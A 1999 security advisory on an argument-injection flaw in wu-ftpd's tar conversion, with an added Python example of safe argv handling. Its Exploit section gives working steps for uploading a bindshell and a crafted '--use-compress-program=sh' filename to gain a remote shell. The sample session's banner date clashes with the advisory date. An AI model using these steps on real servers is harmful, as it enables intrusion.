FTP conversions on misconfigured systems (specifically wu-ftpd) pose a security threat
21 Dec. 1999
Summary
There is a vulnerability in certain configurations of certain ftp daemons through which users with a valid ftp-only account may execute arbitrary commands (including self-supplied binaries). It is also possible for anonymous ftp users to execute arbitrary commands (again, including self-supplied binaries).
FTP Conversion is the name given to the process whereby a user can convert/archive/compress data on the fly when retrieving files from an FTP server. This is done when the FTP user requests a filename and appends .tar/.tar.gz/.Z/.gz to the filename. The FTP daemon then opens a pipe through the requested binary (/bin/tar for example) and sends the file through this pipe to the user.
Vulnerability:
If a malicious user constructs a filename beginning with a '-' sign it is possible to pass arbitrary flags to the command invoked by FTPD. If the user also includes spaces in this filename, they may pass further arguments. Modern tar implementations include some fairly interesting arguments.
From the tar(1) man page:
--use-compress-program PROG
filter the archive through PROG (which must accept -d)
So it can be seen quite obviously that the flag:
--use-compress-program=id
will invoke the id command as a compression program for tar to filter through, obviously failing in the process, but trying nonetheless.
Using this mechanism it is possible to invoke any command in the path. It is also, as mentioned previously, possible to pass those commands further arguments.
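To make the mechanism concrete from the defender's side, the following added Python example (not wu-ftpd's own code) models a conversion command built the weak way, by substituting the requested name into a command template and splitting on whitespace, next to a hardened builder that refuses option-looking names, keeps the name as a single argv element, and places it after `--`. The template string, the function names and the assumption that the caller has already resolved any directory components are illustrative only.

```python
import re

# Constructed template in the style of a conversions entry: the requested
# name replaces %s and tar writes the archive to stdout. This is an
# assumption for illustration, not wu-ftpd's actual source.
TAR_TEMPLATE = "/bin/tar -cf - %s"


def weak_conversion_argv(requested: str) -> list:
    """Weak builder: substitute the name into the template, then split on
    whitespace. A name beginning with '-' is parsed by tar as an option,
    and any embedded spaces become additional argv entries."""
    return (TAR_TEMPLATE % requested).split()


# Whitelist: first character may not be '-', and no whitespace or path
# separators anywhere (directory components are assumed resolved earlier).
_SAFE_NAME = re.compile(r"^[A-Za-z0-9._][A-Za-z0-9._-]*$")


def hardened_conversion_argv(requested: str) -> list:
    """Hardened builder: refuse names outside the whitelist, pass the name as
    ONE argv element, and put it after '--' so tar treats it as an operand
    even if the whitelist is later loosened."""
    if not _SAFE_NAME.match(requested):
        raise ValueError("conversion refused for %r" % requested)
    return ["/bin/tar", "-cf", "-", "--", requested]


def is_option_injection(requested: str) -> bool:
    """Review helper: True if a conversion request would be parsed as a tar
    option or would carry extra arguments (leading '-' or whitespace)."""
    return requested.startswith("-") or any(c.isspace() for c in requested)


if __name__ == "__main__":
    # The filename from this advisory, with the .tar suffix already stripped.
    name = "--use-compress-program=sh blah"
    print(weak_conversion_argv(name))
    try:
        hardened_conversion_argv(name)
    except ValueError as err:
        print("refused:", err)
```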
Impact:
The impact of this bug is that users who may not otherwise have the ability to execute commands may execute arbitrary commands within the path. If those commands can be coaxed into running other commands, a user may obtain an interactive shell. This may be restricted by the default behavior of wu-ftpd to chroot() the anonymous ftp user. However it is still possible for users to upload their own binaries and use the compromised FTP server for:
- launching attacks on your internal network which they may not have had the ability to do previously due to ACLs etc.
- launching denial of service attacks on other sites from your FTP server.
- taking part in distributed attacks, or distributed denial of service attacks, using your compromised FTP server
Exploit:
This vulnerability is simple to exploit. However to exploit it you must be able to upload/download files. (e.g. a mode 0777 incoming directory).
For the purposes of this exploit you also need a shell in the remote path. For example, a RedHat machine with the anonftp package installed has exactly what you need.
First, assuming you are running the same platform as your target, statically compile some sort of backdoor program. A simple example is bindshell.c.
$ gcc bindshell.c -o b -static
Then, tar this up. You will need to tar it up because the remote side will rarely have the ability to change permissions at this stage. (SITE CHMOD rarely works on anonymous ftp sites)
$ tar -cf b.tar b
Create a script of things you want to do on the remote site; it will be interpreted by bash or sh.
$ cat > blah
#
/bin/tar -xf b.tar
./b
^D
Leave the first line as a comment.
Create an empty file called "--use-compress-program=sh blah"
$ > "--use-compress-program=sh blah"
Connect to your target ftp server.
$ ftp localhost
Connected to localhost.
220 localhost.localdomain FTP server (Version wu-2.6.0(1) Tue Sep 21 10:10:10 EDT 2000) ready.
Name (localhost:suid): ftp
331 Guest login ok, send your complete e-mail address as password.
Password:
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
Change to your world-writable directory:
ftp> cd /incoming
Store your files:
ftp> put blah
ftp> put b.tar
ftp> put "--use-compress-program=sh blah"
Now using TAR conversion, get your "--use-compress-program=sh blah" file.
ftp> get "--use-compress-program=sh blah".tar
It should open a connection then freeze. Now telnet to your bindshell port.
Recommendations:
WU-FTPD have taken the stance that because this vulnerability is more a configuration issue than anything else, they do not plan on releasing a patch.
You would be wise to evaluate the need for anonymous ftp on your server and remove the ability if possible.
If you require anonymous ftp access, ensure there are no world-writable directories, and ensure that the smallest number of commands you can get away with exist in the ~ftp/bin directory.